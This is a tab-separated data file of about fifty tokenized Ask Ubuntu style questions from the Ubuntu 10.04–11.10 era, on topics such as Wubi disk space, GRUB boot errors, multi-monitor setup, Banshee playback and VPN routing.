55657	no space left and weird output of df -kh	i installed ubuntu 11 in windows vista using wubi . after using it for 3 days , i encountered the problem `` no space left in device '' . the following is the output of `` df -kh '' : filesystem size used avail use % mounted on /dev/loop0 3.9g 3.9g 0 100 % / none 1.5g 696k 1.5g 1 % /dev none 1.5g 408k 1.5g 1 % /dev/shm none 1.5g 100k 1.5g 1 % /var/run none 1.5g 0 1.5g 0 % /var/lock /dev/sda5 40g 15g 26g 37 % /host /dev/loop1 3.9g 317m 3.4g 9 % /home /dev/loop2 3.9g 2.6g 1.1g 71 % /usr the output of `` df -i '' is : filesystem inodes iused ifree iuse % mounted on /dev/loop0 256000 41900 214100 17 % / none 379462 929 378533 1 % /dev none 381387 15 381372 1 % /dev/shm none 381387 50 381337 1 % /var/run none 381387 3 381384 1 % /var/lock /dev/sda5 0 0 0 - /host /dev/loop1 256000 2561 253439 2 % /home /dev/loop2 256000 149893 106107 59 % /usr i found that /host/ubuntu/disks occupies 14g . the distribution is : drwxr-xr-x 3 root root 32k 2011-07-31 21:56 boot -rwxr-xr-x 1 root root 4.0g 2011-08-03 10:25 home.disk -rwxr-xr-x 1 root root 4.0g 2011-08-03 10:25 root.disk -rwxr-xr-x 1 root root 256m 2011-07-31 22:19 swap.disk -rwxr-xr-x 1 root root 4.0g 2011-08-03 10:15 usr.disk what 's happening ? what should i do to increase space ? can i allocate more space to ubuntu from vista ?
55662	my music seems to be in `` unknown artist '' in everywhere but banshee	recently banshee has decided to change my ogg files to `` unknown artist '' everywhere else but banshee . i do n't know what 's wrong with them but ubuntu one and android music player ca n't read the artist tag anymore . they used to work however , most of my collection ( 500+ songs ) show up as `` unknown '' i have always kept `` write metadata to files '' switched on . anybody got any ideas ? thanks , joe : )
55670	latexdraw on ubuntu 11.04 crashes the system	i have being trying to install and run latexdraw on ubuntu 11.04 but apart from crashes i have gotten nothing else . system was checked for md5sum 's and disk was correctly burnt .
55671	when using monitor in twinview , the os does n't recognize its native resolution , why ?	`` monitor a '' : samsung 940n 19 '' lcd [ vga connection ] '' monitor b '' : samsung 940n 19 '' lcd [ vga connection ] vga card : nvidia geforce gt220 [ has 1 vga , 1 hdmi , 1 dvi ] so i 'm using a `` dvi to vga '' converter . under windows7 : the os recognizes the 1280x1024 native resolution in both monitors , hurray ! under ubuntu 11.04 : the os recognizes one of the monitors ( `` monitor a '' ) as a samsung , ok ! ( resolution is good too ! ) . but : the other monitor ( `` monitor b '' ) is recognized as `` unknown '' , and uses 1024*768 . ( the `` other '' monitor is the one that 's with a dvi to vga converter - `` monitor b '' ) . i installed the nvidia driver too , but it still recognizes the second monitor - `` monitor b '' ( with the dvi to vga converter ) as it would has a maximum resolution of 1024*768 . question : how could i `` tell '' ubuntu to use the `` other '' monitor - `` monitor b '' with 1280*1024 ( the native resolution ) ? ? ?
55672	how can i fix a broken/corrupted iso file ?	i have an iso file i am unable to ever download again , so that 's not an option . it is mountable via : sudo mount -o loop < media > < mountpoint > i can browse all the files that way , but the disk needs to be bootable , and currently the iso file does have some errors . is there a way i can unpack the iso image with boot record and repack it into a new iso or fix errors in the existing iso file ?
55676	store frequently used terminal commands in a file	okay , so i want add a command to my desktop ( or any convenient location ) , and whenever i run it i want it to clone the html5 boilerplate . $ git clone git : //github.com/paulirish/html5-boilerplate.git and i 'm tired of typing it out all the time . so how could i store my commands in a file ? .
55679	how do i launch a game for windows that i installed ?	i managed to install a game for windows using wine ( i think ) , but it does n't show in the applications/games folder or in the ubuntu software center . did it really install ? how do i find it ? when i was running the setup , i believe the game installed in the c : \games\freespace directory .
55680	spotify native crashing on start	since an update about 8 weeks ago , spotify native will no longer start . below is the terminal output : tom @ blacknight : ~ $ spotify 17:31:59.810 i [ breakpad.cpp:36 ] registered breakpad for product : spotify 17:31:59.879 i [ translate.cpp:117 ] reloading all languages 17:31:59.889 i [ fsevents:403 ] starting polling thread 17:31:59.949 i [ breakpad.cpp:94 ] searching for crashdumps : /home/tom/.cache/spotify/*.dmp 17:32:00.923 i [ ap:1374 ] connecting to ap b1.spotify.com:4070 17:32:01.058 i [ ap:924 ] connected to ap : 78.31.8.42:4070 qdbusargument : write from a read-only object 17:32:01.413 i [ upnp:517 ] 192.168.1.1 : got external ip 0x51663686 17:32:01.423 i [ upnp:465 ] 192.168.1.1 : mapping add ok 17:32:01.429 i [ upnp:491 ] 192.168.1.1 : port 21238 mapped ok segmentation fault tom @ blacknight : ~ $ does anyone know of a solution ? there 's been a couple of updates since but neither have fixed this : ( ubuntu 11.04 x64 , classic desktop
55682	using f-spot , how can i find the file location for a specific photo ?	several of my parents ' photos in f-spot have gone missing . i ca n't seem to figure out the location of the photo file that f-spot expects to find . i 've been looking around for something like `` photo properties '' but so far i have n't seen it . this is sounding confusing , so hopefully a screenshot will help clear things up : in this photo , f-spot is missing a picture . we can see that the filename is img_0445.jpg . i 've found the actual photo in my backups . i 'm having a hard time replacing the missing photo , because i ca n't figure out in which directory f-spot is expecting to find the photo . is there any way , using f-spot to find the file location of a photo ? something like banshee 's `` open containing folder '' ? i thought previously you could right-click a photo and choose `` copy file location '' , but i 'm not seeing that option in f-spot 0.8 .
55685	how to test apache server on ubuntu server 10.04 running in virtualbox ?	i installed ubuntu server 10.04 via virtualbox , yes , the i use virtual machine , cuz i am learning ubuntu . i installed apache webserver by this command : sude apt-get install apache2 everything looks okay , no error . now , how do i test if the apache server is working ? normally in windows os , after install apache , i go to web browser , point to 127.0.0.1 , and the webpage will display `` it works '' . how do i test my ubuntu server web apache ?
55686	ubuntu one uploads unchanged data frequently	i ran into the following issue : i 'm using ubuntu one to sync my files ( across multiple computers ) , for what it 's intended . but due to some mysterious reason it promts to me , that there will be some files uploaded . and this again and again and so on . plus , when i want to shut down my computer and dismiss the desktop session , i 'm notified , that ubuntu one is currently running or hung up unexpected .
55688	is there a graphical way of installing fonts in 11.10/gnome 3	when testing 11.10 , i wanted to install some fonts . however , it seems that i can not simply double click a font file to install it . i 've tried searching google , but i have n't found anything that says the gnome3 ca n't do this . is this going to be addressed ? is there a way i can install new fonts easily ? ( i know of the manual copying of the fonts to /usr/share/fonts/ , but i 'm just curious if there is something easier i 've been missing . ) thanks
55691	what are the implications of re-installing gconf	due the issue mentioned in error-in-a-gconf-entries-file-breaks-my-package-manager , i am contemplating reinstalling gconf , how would that effect my system ?
55693	reopen ejected sd card ?	i 'm new to linux and have ubuntu 11.04 . after you eject an sd card , how do you reinsert a different one in the same slot ? my computer wont recognize any after the first one and after the initial eject , the drive disappears in the disk utility . thanks in advance
55697	shotwell & nautilus not emailing pictures	when i want to email pictures , i open shotwell and select the ones that i want . i right-click and use the `` send to '' to have them sent as an email , but nothing is sent . i have evolution set up with my email .
55698	how do i fix `` no public keys available '' errors ?	when i download updates or installing new software i get these warnings that i have no public keys . this just appeared one day and i did n't remove/add something to create this . release : the following signatures could n't be verified because the public key is not available : no_pubkey 16126d3a3e5c1192 i have tried : sudo apt-key update and it worked for some keys , but others are still missing , i need to add them . i need help with adding the new keys and the address to all the keys . those that are n't in ubuntu and launchpad . the full error message .
55700	fresh install wo n't boot throwing `` error : end of disk ''	i have a machine which is supposed to be a media server . i have tried to install ubuntu ( both alternate and regular i386 ) . the installation ( and boot to usb drive ) went on fine , but after the install i tried to load the machine and it froze . in the case of i386 i get the error `` hd0 out of disk '' and am left with a grub rescue console . set gives : prefix= ( hd0 , msdos1 ) /boot/grub root=hd0 , msdos1 following ubuntu wiki , i replaced msdos1 with 1 which did n't work . in the case of the alternate install , i only get a blinking cursor on the top left ( i waited for about two minutes ) . if i wait a really long time in the alternate version , i get : error : no such partition grub rescue > nothing works in this mode as well . i also tried to replace ( hd0,1 ) with ( hd0 , sda ) or ( hd0,0 ) but this does n't seam to have an effect . install information : single hard drive install on a hard drive via usb thumb drive ubuntu 's default hard drive portioning and formatting ( use entire hard drive ) ubuntu natty how can i fix this ?
55702	`` df -h '' command puts line breaks in output . how do i fix ?	my `` df -h '' command on my linux box has some devices with longer names and so the `` df -h '' output has line breaks ( or tabs ? ? ) in it , which makes it difficult to parse the output in a script . does anyone know how i can suppress the linebreaks so that the latter of the following outputs is what i get : [ root @ me ~ ] # df -kh filesystem size used avail use % mounted on /dev/mapper/volgroup00-logvol00 3.9g 404m 3.3g 11 % / /dev/mapper/volgroup00-logvol05 3.9g 442m 3.3g 12 % /home /dev/mapper/volgroup00-logvol04 3.9g 261m 3.5g 7 % /var /dev/mapper/volgroup00-logvol03 3.9g 137m 3.6g 4 % /tmp /dev/mapper/volgroup00-logvol02 7.8g 3.6g 3.8g 49 % /usr and the desired format is : [ root @ me ~ ] # df -kh filesystem size used avail use % mounted on /dev/mapper/volgroup00-logvol00 3.9g 404m 3.3g 11 % / /dev/mapper/volgroup00-logvol05 3.9g 442m 3.3g 12 % /home /dev/mapper/volgroup00-logvol04 3.9g 261m 3.5g 7 % /var /dev/mapper/volgroup00-logvol03 3.9g 137m 3.6g 4 % /tmp /dev/mapper/volgroup00-logvol02 7.8g 3.6g 3.8g 49 % /usr
55703	usb mouse cuts out on battery power	i 'm using ubuntu 11.04 64 bit laptop , and i have a microsoft mouse . when i 'm on the battery power the mouse cuts in and out , i have full battery power so it 's not because of low power . it never does this in windows , and in the past when i ran karmic it never did this either , only when i reinstalled ubuntu with natty . as soon as i plug in the power it works perfectly fine .
55705	adding an mp3 file to a playlist on banshee ?	how do i add an mp3 file to my playlist on banshee media player ? in itunes , i used to drag the .mp3 file into the window and it would automatically sync the music file into the playlist . how can i do this with banshee ?
55706	automate twinview	my question is basically this question , but that 's rather old now , and desktop linux is changing fast . i have a laptop with nvidia graphics ( geforce 9800m gs ) , the proprietary drivers , and ubuntu 11.04 ( using unity ) . can twinview be automated so that when i disconnect my external monitor , it 's automatically disabled ? the reserve would be nice as well , but the first is more important .
55707	how to permanently hide unity dock ?	i like unity , and the way it organizes applications but i do n't like the dock . i would like to use docky instead . if it 's possible , i do n't even want to see the dock when i hit the super key . i do n't even wan na see it when i open unity launcher . while i wish this was all possible , i know this is probably impossible but it 's worth a shot .
55708	where are firefox flash temporary files ?	when playing flash multimedia on firefox eg . a youtube video , the files used to be stored in /tmp/ , but they do not appear there any more . where are these temporary files stored ?
55709	how to select display to record in recordmydesktop	i have a dual monitor setup and wish to only record the 1st monitor with recordmydesktop , but i am unsure of the settings when doing it via the command line , so far i have this : recordmydesktop -- display=1 -- width=1920 height=1080 -- fps=15 -- no-sound -- delay=10 but i get this error message : can not connect to x server 1 how do i find the right x server to connect to and are the rest of my settings correct ? i 'm using 11.04 , cheers .
55712	game crashes half the times i try to run it	thanks to the help of the community i was able to install descent : freespace using wine . now when i try to run it , most of the times the screen turns black and the system becomes completely unresponsive . sometimes the game loads , but the top and bottom of the game screen are covered by the ubuntu desktop menu bars , and i ca n't move the mouse to the edges of the screen . how do i go about fixing this ?
55716	how to add a playlist onto ipod using clementine ?	hi i was wondering how you are suppose to add playlists created on my computer to my ipod using clementine ?
55718	change default location of programs / users	i just bought a new ssd hard drive and want to minimize writing to the drive by moving users and applications to another 1tb hard drive . windows 7 accomplishes this fairly easily . i want to know how i can do the same on ubuntu 11.04 . i want to globally move all new installations and users to the other hard drive ( so instead of using the default drive , it uses another drive to load from ) . os updates ( and drivers ? ) can still goto the ssd . i just want this to last as long as possible .
55723	where would i find the purchased music folder on my system ?	where would i find the purchased music folder on my system ? i 'm running ubuntu 11.04 .
55734	repository down ? how do i workaround ?	i 'm getting the following errors while trying to install samba on a ubuntu server 10.04 lts instance : failed to fetch http : //us.archive.ubuntu.com/ubuntu/pool/main/s/samba/libwbclient0_3.4.7~dfsg-1ubuntu3.6_i386.deb 404 not found [ ip : 91.189.88.31 80 ] is there any way to workaround this so i do n't have to wait for the update servers to come back up ? how do i prevent this in the future ? edit : i found a very similar posting here on askubuntu : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/maverick/release but lekensteyn 's answer does n't work ( though it helped the author of the given question ) ... i still get the following ( after switching repo 's to in.archive.ubuntu.com ) : root @ orbital /home # apt-get install samba reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : samba : depends : samba-common-bin but it is not going to be installed depends : libwbclient0 ( = 2:3.4.7~dfsg-1ubuntu3.4 ) but it is not going to be installed depends : libtalloc2 ( > = 2.0.0 ) but it is not installable depends : update-inetd but it is not installable e : broken packages if all else fails , how will i know when the repository is available again ?
55737	ca n't install ubuntu 10.04 or later due to installer error and crash	this is really , really , really , aggravating . everytime i try to install ubuntu ( 10.04 & up ) , it works fine up until the point where i actually have to install . it installs about halfway until i get error # 5 & the installer just crashes , bringing me to a live cd environment . i 'm pretty sure this is ubuntu 's problem because linux mint & elementary os ( both of which are based on ubuntu.. ) install just as they should..
55740	how to find which wifi frequencies are being used the most near by ?	we have a lot of wifi connections nearby and i 'd like to know which band has the least interference . i 'd like to to know how many connections are on each band and pick the best to configure my router from that data .
55742	can i do anything about these skype bugs ?	skype has been bugged for me in every install of ubuntu i 've had . and it 's always the same bugs : the icon still shows up in the taskbar when i 'm watching fullscreen video . when i try to open skype while skype is already running , it tries to start a new instance , instead of accessing the process that already exists . these seem like pretty ridiculous bugs . i figured they would be fixed quickly . but they have n't . and now that microsoft owns skype ... is there any hope that skype is going to be fixed ? has microsoft ever released any software that runs on linux ? i hear asp wo n't even run on a linux server ... is tehre anything i can do to not let these bugs bug me ?
55750	single click vnc with windows	i’m trying to help someone on a windows machine . the irony is that i now need help myself to connect the 2 computers . i open my remote desktop viewer , put it in listening mode by selecting ’reverse connection…’ but nothing happens when the other side runs the one click vnc executable . my 5500 port is open so i find it hard to believe this is a forwarding problem .
55751	in 10.10 , usb 3.0 pci express card recognized by lspci but not lsusb or dmesg . how to fix ?	asus n pc , runs 10.10 x86_64 the asus n comes with 4 usb 2.0 ports , each labelled 2.0 on the case . attempting to add two usb 3.0 ports to be provided by a generic usb 3.0 pci express card installed in the pci expres slot . the new card says usb 3.0 and has the blue ports . the card is installed into the laptop unpowered , then the laptop is powered on and boots normally . nothing happens when a usb 3.0 flash drive is inserted into the usb 3.0 port . uname -a linux drpaulbrewer-n90sv 2.6.35.8 # 1 smp fri jan 14 15:54:11 est 2011 x86_64 gnu/linux lspci -v 00:00.0 host bridge : silicon integrated systems [ sis ] 671mx subsystem : asustek computer inc. device 1b27 flags : bus master , medium devsel , latency 64 kernel modules : sis-agp 00:01.0 pci bridge : silicon integrated systems [ sis ] pci-to-pci bridge ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=01 , subordinate=01 , sec-latency=0 i/o behind bridge : 0000d000-0000dfff memory behind bridge : fa000000-fdefffff prefetchable memory behind bridge : 00000000d0000000-00000000dfffffff capabilities : [ d0 ] express root port ( slot+ ) , msi 00 capabilities : [ a0 ] msi : enable+ count=1/1 maskable- 64bit- capabilities : [ f4 ] power management version 2 capabilities : [ 70 ] subsystem : silicon integrated systems [ sis ] pci-to-pci bridge kernel driver in use : pcieport 00:02.0 isa bridge : silicon integrated systems [ sis ] sis968 [ mutiol media io ] ( rev 01 ) flags : bus master , medium devsel , latency 0 00:02.5 ide interface : silicon integrated systems [ sis ] 5513 [ ide ] ( rev 01 ) ( prog-if 80 [ master ] ) subsystem : asustek computer inc. device 1b27 flags : bus master , medium devsel , latency 128 i/o ports at 01f0 [ size=8 ] i/o ports at 03f4 [ size=1 ] i/o ports at 0170 [ size=8 ] i/o ports at 0374 [ size=1 ] i/o ports at ffe0 [ size=16 ] capabilities : [ 58 ] power management version 2 kernel driver in use : pata_sis 00:03.0 usb controller : silicon integrated systems [ sis ] usb 1.1 controller ( rev 0f ) ( prog-if 10 [ ohci ] ) subsystem : asustek computer inc. device 1b27 flags : bus master , medium devsel , latency 64 , irq 20 memory at f9fff000 ( 32-bit , non-prefetchable ) [ size=4k ] kernel driver in use : ohci_hcd 00:03.1 usb controller : silicon integrated systems [ sis ] usb 1.1 controller ( rev 0f ) ( prog-if 10 [ ohci ] ) subsystem : asustek computer inc. device 1b27 flags : bus master , medium devsel , latency 64 , irq 21 memory at f9ffe000 ( 32-bit , non-prefetchable ) [ size=4k ] kernel driver in use : ohci_hcd 00:03.3 usb controller : silicon integrated systems [ sis ] usb 2.0 controller ( prog-if 20 [ ehci ] ) subsystem : asustek computer inc. device 1b27 flags : bus master , medium devsel , latency 64 , irq 22 memory at f9ffd000 ( 32-bit , non-prefetchable ) [ size=4k ] capabilities : [ 50 ] power management version 2 kernel driver in use : ehci_hcd 00:04.0 ethernet controller : silicon integrated systems [ sis ] 191 gigabit ethernet adapter ( rev 02 ) subsystem : asustek computer inc. device 11f5 flags : bus master , medium devsel , latency 0 , irq 19 memory at f9ffcc00 ( 32-bit , non-prefetchable ) [ size=128 ] i/o ports at cc00 [ size=128 ] capabilities : [ 40 ] power management version 2 kernel driver in use : sis190 kernel modules : sis190 00:05.0 ide interface : silicon integrated systems [ sis ] sata controller / ide mode ( rev 03 ) ( prog-if 8f [ master secp seco prip prio ] ) subsystem : asustek computer inc. device 1b27 flags : bus master , medium devsel , latency 64 , irq 17 i/o ports at c800 [ size=8 ] i/o ports at c400 [ size=4 ] i/o ports at c000 [ size=8 ] i/o ports at bc00 [ size=4 ] i/o ports at b800 [ size=16 ] i/o ports at b400 [ size=128 ] capabilities : [ 58 ] power management version 2 kernel driver in use : sata_sis kernel modules : sata_sis 00:06.0 pci bridge : silicon integrated systems [ sis ] pci-to-pci bridge ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=02 , subordinate=02 , sec-latency=0 memory behind bridge : fdf00000-fdffffff capabilities : [ b0 ] subsystem : silicon integrated systems [ sis ] device 0004 capabilities : [ c0 ] msi : enable+ count=1/1 maskable- 64bit+ capabilities : [ d0 ] express root port ( slot+ ) , msi 00 capabilities : [ f4 ] power management version 2 kernel driver in use : pcieport 00:07.0 pci bridge : silicon integrated systems [ sis ] pci-to-pci bridge ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=03 , subordinate=06 , sec-latency=0 i/o behind bridge : 0000e000-0000efff memory behind bridge : fe000000-febfffff prefetchable memory behind bridge : 00000000f6000000-00000000f8ffffff capabilities : [ b0 ] subsystem : silicon integrated systems [ sis ] device 0004 capabilities : [ c0 ] msi : enable+ count=1/1 maskable- 64bit+ capabilities : [ d0 ] express root port ( slot+ ) , msi 00 capabilities : [ f4 ] power management version 2 kernel driver in use : pcieport 00:0f.0 audio device : silicon integrated systems [ sis ] azalia audio controller subsystem : asustek computer inc. device 17b3 flags : bus master , medium devsel , latency 0 , irq 18 memory at f9ff4000 ( 32-bit , non-prefetchable ) [ size=16k ] capabilities : [ 50 ] power management version 2 kernel driver in use : hda intel kernel modules : snd-hda-intel 01:00.0 vga compatible controller : nvidia corporation g96 [ geforce gt 130m ] ( rev a1 ) ( prog-if 00 [ vga controller ] ) subsystem : asustek computer inc. device 2021 flags : bus master , fast devsel , latency 0 , irq 16 memory at fc000000 ( 32-bit , non-prefetchable ) [ size=16m ] memory at d0000000 ( 64-bit , prefetchable ) [ size=256m ] memory at fa000000 ( 64-bit , non-prefetchable ) [ size=32m ] i/o ports at dc00 [ size=128 ] [ virtual ] expansion rom at fde80000 [ disabled ] [ size=512k ] capabilities : [ 60 ] power management version 3 capabilities : [ 68 ] msi : enable- count=1/1 maskable- 64bit+ capabilities : [ 78 ] express endpoint , msi 00 capabilities : [ b4 ] vendor specific information : len=14 < ? > kernel driver in use : nvidia kernel modules : nvidia-current , nouveau , nvidiafb 02:00.0 network controller : atheros communications inc. ar928x wireless network adapter ( pci-express ) ( rev 01 ) subsystem : device 1a3b:1067 flags : bus master , fast devsel , latency 0 , irq 16 memory at fdff0000 ( 64-bit , non-prefetchable ) [ size=64k ] capabilities : [ 40 ] power management version 2 capabilities : [ 50 ] msi : enable- count=1/1 maskable- 64bit- capabilities : [ 60 ] express legacy endpoint , msi 00 capabilities : [ 90 ] msi-x : enable- count=1 masked- kernel driver in use : ath9k kernel modules : ath9k 03:00.0 usb controller : nec corporation upd720200 usb 3.0 host controller ( rev 03 ) ( prog-if 30 ) flags : bus master , fast devsel , latency 0 , irq 10 memory at febfe000 ( 64-bit , non-prefetchable ) [ size=8k ] capabilities : [ 50 ] power management version 3 capabilities : [ 70 ] msi : enable- count=1/8 maskable- 64bit+ capabilities : [ 90 ] msi-x : enable- count=8 masked- capabilities : [ a0 ] express endpoint , msi 00 lsusb bus 003 device 002 : id 0b05:1751 asustek computer , inc. bt-253 bluetooth adapter bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 004 : id 0bda:0158 realtek semiconductor corp. usb 2.0 multicard reader bus 001 device 002 : id 04f2 : b071 chicony electronics co. , ltd 2.0m uvc webcam / cnf7129 bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub dmesg trying to post dmesg exceeded the stackexchange posting limit of 30k ... but nothing there is usb 3.0
55753	when ca n't i play an mp3 file in banshee ?	i wanted to play media files on banshee but it seems there is a huge problem in it . all the music gets loaded but when i select a song and press play button nothing happens . more than that when i try to play some mp3 on movie player error pops up saying - `` could not determine type of stream . '' i have already installed the updates needed to run mp3 files and other stuff . my mk5 videos are playing perfectly . banshee gives no such errors but fails to run . what will solve my problem . reinstalling banshee after uninstalling or reinstalling the system updates ? i checked whether is was something wrong with unity . but it was n't . even this happens in y gnome . is this some kind of a bug ?
55756	how can i get a pxe install to ask for the hostname	i use a pxe install for a lab of machines , one problem i have is that the hostname is always set to 'ubuntu ' . this is wrong , it should instead ask during the install what hostname should be used . one hack was to set the hostname file at the end of the preseed , in the script section . but this still does n't ask the installer .
55766	is there an app that can set color labels for individual files and folders ?	is there any app that could set label color for individual file/folder like in mac os x ? just something like this :
55767	braid downloaded from humble bundle 3 is not running on 11.04	hello fellow brothers in linux i run ubuntu 11.04 32bit and i need your help . had downloaded braid from humble bundle 3 . they have provided a debian package and installed the game but the game wo n't run , i click on the braid icon but nothing happens . ( i am running nvidia 9800gt with the latest drivers so my system is an able being ) and have already contacted the humble bundle guys and they can not help because they claim to have short hand in linux and asked to look in linux forums .
55769	where does gnome-display-properties save the different configurations ?	i use gnome-display-properties to configure the external screens that i attach to my laptop at home and in the office . gnome-display-properties cleverly remembers which screen is which , and automatically sets the display up when the screen is plugged . for example , in gnome-display-properties , the monitor shows as `` monitor : samsung electric company 24 '' '' , i wonder where is this info pulled from ? where is this information saved ?
55770	changing language at login does n't do anything ?	whenever i am changing the language at the time of login , the language in the regional format does n't change.why does that happen ? . i am facing a very strange behavior in ubuntu 11.04 , as in normal cases when ever we change language at the time of login its change its locale variable and it use to set that selected language as the default language in '' text '' tab of the language support up till the ubuntu version 10.10 , but in ubuntu 11.04 its not the case . when ever we change the language at the time of login at that time the language is not set in the `` regional formats '' of the language support.so it is not changing the lang variable of the `` locale '' command in th ubuntu . so is it a bug or the change in behavior for the ubuntu 11.04 .
55771	how to display package upgrade details on command line ?	on desktop machines , the update manager application is able to show the details of a package upgrade in the section called `` description of update '' in the bottom half of the screen . is there a way to see this information for a server machine using the command line ?
55776	how do i install ubuntu 11.04 onto a 4 gb usb drive ?	so a .iso is currently downloading onto my flash drive . after that , what do i do ? i 'm just scared of deleting windows 7 and all my files .
55779	open irc : // links in xchat from firefox and chromium	i want to open channels in servers specified in irc : // links in xchat , but directly pointing to xchat binary ( in firefox ) did not work - the window to choose servers appears as usual . i do n't know how to associate irc : // links with xchat in chromium .
55782	rss reader that integrates with unity 's messaging menu ?	right now i use liferea , its problem is that the messaging icon does not change when there is a new message : is there an rss reader that integrates better in unity ? my only requirement is : when there is a new message , it should be visible ( for instance different colour ) without having to click the envelope to check inside the menu .
55784	create .img file for use with kvm	how do i create a .img file or any disk image to be used with kvm ?
55785	how to effectively test deployment script	i 'm developing a script for my company that installs all the dependencies we have and sets up some of the software . i need some way to effectively test my script on a clean machine over and over . is there some way to `` reset '' the system to the state it was in when it was just installed ? or would the best approach be to have a virtual machine that i can reset ?
55789	connecting wifi without networkmanager	my friend has deleted network manager . however , now she want connect internet over using wireless . how can i manage that wish without network manager ? edit : it was deleted by using ubuntu software center .
55790	without using any tool , can one download any package from internet	without using software center and apt-get , how can one download a package like ghdl , gsharp . are there any pool in which one can find all things ?
55791	configuring cisco vpn anyconnect to use vpn and the local network simultaneously	i want to use vpn and lan access simultaneously ( using local printers , smb shares , ... ) theoretically the task should be easy : all local ip 's targets ( 192 . * ) should go directly to eth0 , the rest to the virtual device . as i get static `` global '' ip from the vpn , there will be no ambiguity and the routing wo n't be complicated . there have to be 2 dns servers : the local one and the one provided via vpn . when not connected to vpn i have 3 routes ( dest , router , iface ) : 192 . * , * , eth0 link-local , * , eth0 default , natrouter.local , eth0 when connected to vpn i have 5 routes : asa-1.vpn. , ( ipofnatrouter ) , eth0 141. , * , cscotun0 192 . * , * , eth0 link-local , * , eth0 default , 211.vpn. , cscotun0 thus it should be possible to access the lan , but when pinging a local ip ( even as root ) i get ping : sendmsg : operation not permitted how can i make this work with ( x ) ubuntu 10.10 and the cisco anyconnect vpn ? note that , since michaĺ ĺ rajer gave a workaround , i 'm now searching for the intended solution ( using config xml ) . even when editing the /opt/cisco/vpn/profile/anyconnect-targetvpn-default.xml it gets overriden with each established vpn connection . i played around with < locallanaccess > and < pppexclusion > as mentioned in the documentation ( pdf ) without any mentionable success . overriding /etc/resolv.conf with an appropriate config for lan and vpn lets vpanagentd consume all cpu . as the vpn client changes that file at start , it is neccessary to modify it `` live '' . as a workaround i use a modified /etc/hosts file .
55796	how can i install a tar.bz2 file ?	in ubuntu 10.04 , how can one install a tar.bz2 file ? i do not know how to do it so are there any one can help me ? ex : package name is : manager-0.8.3.998.tar.bz2
55799	how to retreive password stored in firefox ?	i would like to retrieve an important password which i forgot , but which firefox has remembered and uses to log in . where is this password stored and is it ( or can it be made ) readable ?
55800	add folders in ubuntuone with kubuntu 11.04	i 've installed the client for ubuntuone in my kubuntu 11.04 desktop but i 'd like to add and sync some other folders of my home dir except the standard one , is it possible ? thank you all .
55801	cloud : can i use the same account for 2 computers with different data	i have two computers , a laptop and a desktop , i use my laptop for study and tower for movies and songs , so i have different data on either computers , can i use the same 'cloud ' account for both computers and still be able to sustain my current data on both computers
55804	impossible to update grub2 entries	i installed an ubuntu studio in one of the partitions that i had for using gnome3 . the grub2 that was installed by the default ubuntu studio changed all the /boot/grub/grub.cfg file creating its own menu . till here no problem , everything going normal . the thing is that it wrote on the grub2 menu the new entry for the ubuntu studio kernel and the others so 's ( windows and the default natty with unity ) but it still there the entry for the gnome3 kernel and it is the grub2 menu entry for using the natty-unity kernel and the ubuntu-natty kernel does nothing . i tried to edit the /boot/etc/grub.cgf file in the ubuntu studio and at the natty-unity installations and every time that i run sudo update-grub2 it write 's back again the old menu entry that the ubuntu studio installation did . i tried also using the grub-customizer gui to change the entry but there is no effect at all when i try to update the grub2 menu . theres any other way that i can fix this problem without having to edit an entry in /etc/grub.d ? because in the ubuntu forum the explanation how to do it so it 's not that clear . please help . thanks in advance .
55805	how do i re-install network manager without an internet connection ?	i have only wireless connection , one computer with a connection and 4gb usb . my second computer has no network connection , because i have deleted it from the software center . however , now i want to re-install it . how can i do that ?
55807	wired network disconnected by networkmanager - how to fix ?	ubuntu 11.04 , classic desktop . hardware is working fine , and network was working previously , but after changing my location ( and rebooting the machine ) , ubuntu just says 'wired network disconnected ' . router shows working connection , and booting to xp gives a working network . what could i try to fix this ? ifconfig shows eth0 interface with an ipv6 address only . edit : eth0 link encap : ethernet hwaddr 00:13:8f:81:88:89 broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:17 base address:0xe800 auto lo iface lo inet loopback # this file is installed into /etc/networkmanager , and is loaded by # networkmanager by default . to override , specify : ' -- config file ' # during nm startup . this can be done by appending to daemon_opts in # the file : # # /etc/default/networkmanager # [ main ] plugins=ifupdown , keyfile [ ifupdown ] managed=false okay , new info : ifdown eth0 says ifdown : interface eth0 not configured
55808	external usb hdd unreadable after formatting	i am using a western digital 160gb external usb drive . it was working fine earlier but for some reasons i formatted it using the 'disk utility ' in my ubuntu 11.04 i chose 'dont partition ' while formatting it . and since then , its unreadable in my or any other system . i also used 'master boot ' formatting after that but to no avail . now i can still see it being detected in my 'disk utility ' but its not being readable . i am using an aspire acer one netbook . please help .
55811	kvm does not recognize restart call from guest os	i am installing windows xp directly using kvm : kvm -m 256 -hda xp.img -cdrom xp\ disk\ image.iso -boot d -smp 1 after formatting and initial round of copying files , it remains in the screen saying it 's restarting . i have to manually close the qemu window and start kvm again . how can i get it to respond os signals ?
55816	how can i increase time of working from my battery ?	usually i am not even able to watch film from start to end . i use acer aspire 5930 os is ubuntu 11.04 i use classic ubuntu desktop ( afaik it really means gnome2 ) i know , that : i can decrease brightness i can switch off bluetooth i can use classic ubuntu ( no effects ) ( do n't really sure that it helps , it change appearance , though ) i can kill some daemons i.e dropbox what is my question ? a lot of time i work with my laptop from my home and battery is not used . in this time i want to see all beauty and speed of my system . now i want to know : what can i do more to increase time of work from battery what kind of daemons are used by default by really i not need it when iâm not in my home ? how can i do it automatically when i start work from battery and stop it when i stop .
55819	how to queue commands	suppose i have jobs to run one after another , how can i queue them up and if possible still retain the output/log each script produces . ( eg . i can use at to schedule tasks but i dont get the log/output of each app )
